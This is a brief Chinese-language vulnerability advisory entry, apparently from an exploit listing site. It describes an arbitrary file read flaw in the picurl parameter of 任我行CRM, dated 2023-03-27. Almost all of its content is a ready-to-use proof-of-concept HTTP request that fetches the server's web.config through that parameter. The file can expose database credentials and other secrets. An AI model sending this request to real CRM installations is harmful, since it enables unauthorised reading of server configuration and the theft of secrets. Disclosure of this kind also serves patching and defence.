任我行CRM picurl 参数存在任意文件读取漏洞

日期: 2023-03-27 | 影响软件: 任我行CRM | POC: 已公开

漏洞描述

任我行CRM picurl 参数存在任意文件读取漏洞

PoC代码

GET /Common/PictureView1/?picurl=/web.config HTTP/1.1

相关漏洞推荐